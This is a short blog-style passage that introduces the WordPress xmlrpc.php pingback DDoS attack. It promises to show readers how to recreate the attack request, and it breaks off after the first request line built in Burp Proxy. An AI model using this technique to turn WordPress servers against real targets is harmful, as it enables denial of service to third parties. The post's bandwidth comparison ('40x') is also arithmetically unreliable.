WordPress XMLRPC.php DDOS Attack
The Bigger They Come, The Harder They Fall
Earlier this year, a vulnerability was exploited that used the PingBack feature in WordPress. I am going to show how to create a request to recreate the attack. The attack sent upwards of 400 Gbps through the internet. By comparison, your home network is, on a good day, theoretically 100 Mbps. This attack pumped 40x more traffic than your home network can ever do.
I created the request in Burp Proxy:
POST /xmlrpc.php HTTP/1.0